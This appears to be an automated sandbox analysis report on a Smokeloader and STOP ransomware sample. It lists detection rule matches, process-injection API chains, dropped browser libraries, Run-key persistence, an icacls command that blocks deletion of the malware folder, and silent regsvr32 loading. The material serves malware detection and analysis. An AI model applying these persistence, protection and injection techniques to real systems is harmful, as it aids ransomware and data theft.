                    Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: String function: 00409F79 appears 112 times
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: String function: 0041BE00 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: String function: 0058A1E0 appears 112 times
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: String function: 02368EC0 appears 38 times
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: String function: 02370160 appears 31 times
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_004017E3 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402072 NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00401807 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_004017E2 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_004017EE Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00401EFD NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_004017E3 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402072 NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00401807 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_004017E2 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_004017EE Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00401EFD NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_02340110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: A658.exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9907388906649617
                    Source: A658.exe.28.drStatic PE information: Section: .data ZLIB complexity 0.9907388906649617
                    Source: 5tLwjRFzAW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irbiwatJump to behavior
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@19/22@31/12
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\E69F.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\5tLwjRFzAW.exe "C:\Users\user\Desktop\5tLwjRFzAW.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\irbiwat C:\Users\user\AppData\Roaming\irbiwat
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\28E9.exe C:\Users\user\AppData\Local\Temp\28E9.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    Source: unknownProcess created: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe --Task
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E69F.exe C:\Users\user\AppData\Local\Temp\E69F.exe
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Users\user\AppData\Local\Temp\A658.exe "C:\Users\user\AppData\Local\Temp\A658.exe" --Admin IsNotAutoStart IsNotTask
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\33.exe C:\Users\user\AppData\Local\Temp\33.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\28E9.exe C:\Users\user\AppData\Local\Temp\28E9.exe
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\33.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\33.exeProcess created: unknown unknown
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\28E9.tmpJump to behavior
                    Source: softokn3.dll.20.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3.dll.20.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: softokn3.dll.20.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3.dll.20.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3.dll.20.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3.dll.20.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3.dll.20.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3.dll.20.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: sqlite3.dll.20.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: sqlite3.dll.20.dr, nss3.dll.20.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3.dll.20.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: sqlite3.dll.20.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: sqlite3.dll.20.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3.dll.20.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040A1FE CreateToolhelp32Snapshot,Process32First,Process32Next,
                    Source: C:\Users\user\AppData\Local\Temp\E69F.exeMutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323
                    Source: A658.exeString found in binary or memory: set-addPolicy
                    Source: A658.exeString found in binary or memory: id-cmc-addExtensions
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: 5tLwjRFzAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
                    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: freebl3.pdb source: freebl3.dll.20.dr
                    Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
                    Source: Binary string: C:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
                    Source: Binary string: FC:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
                    Source: Binary string: mozglue.pdb@+ source: mozglue.dll.20.dr
                    Source: Binary string: ZC:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
                    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: nss3.pdb source: nss3.dll.20.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.20.dr
                    Source: Binary string: \Downloads\Documents\f3iwnx51rxg\output.pdb source: 33.exe.4.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.20.dr
                    Source: Binary string: C:\jid.pdb source: 5tLwjRFzAW.exe, irbiwat.4.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.20.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeUnpacked PE file: 20.2.28E9.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeUnpacked PE file: 0.2.5tLwjRFzAW.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Roaming\irbiwatUnpacked PE file: 17.2.irbiwat.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeUnpacked PE file: 20.2.28E9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402847 push ebp; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E56 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E5E push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E6A push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E70 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E05 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E1F push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E88 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E8F push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402E96 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402EA4 push eax; ret
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00401AAC push edi; iretd
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00402DB7 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402847 push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E56 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E5E push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E6A push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E70 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E05 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E1F push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E88 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E8F push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402E96 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402EA4 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00401AAC push edi; iretd
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00402DB7 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_040E28AE push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_040E1B13 push edi; iretd
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0041C24D push esp; ret
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0041C25C push 940041C2h; retn 0041h
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0043A327 push eax; iretd
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                    Source: nss3.dll.20.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.20.drStatic PE information: section name: .didat
                    Source: mozglue.dll.20.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.20.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.20.drStatic PE information: section name: .00cfg
                    Source: sqlite3.dll.20.drStatic PE information: section name: /4
                    Source: sqlite3.dll.20.drStatic PE information: section name: /19
                    Source: sqlite3.dll.20.drStatic PE information: section name: /31
                    Source: sqlite3.dll.20.drStatic PE information: section name: /45
                    Source: sqlite3.dll.20.drStatic PE information: section name: /57
                    Source: sqlite3.dll.20.drStatic PE information: section name: /70
                    Source: sqlite3.dll.20.drStatic PE information: section name: /81
                    Source: sqlite3.dll.20.drStatic PE information: section name: /92
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irbiwatJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\28E9.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E69F.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeFile created: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\33.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A658.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irbiwatJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D0E3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\5tlwjrfzaw.exeJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\irbiwat:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\E69F.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: 5tLwjRFzAW.exe, 00000000.00000002.295033030.00000000026F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
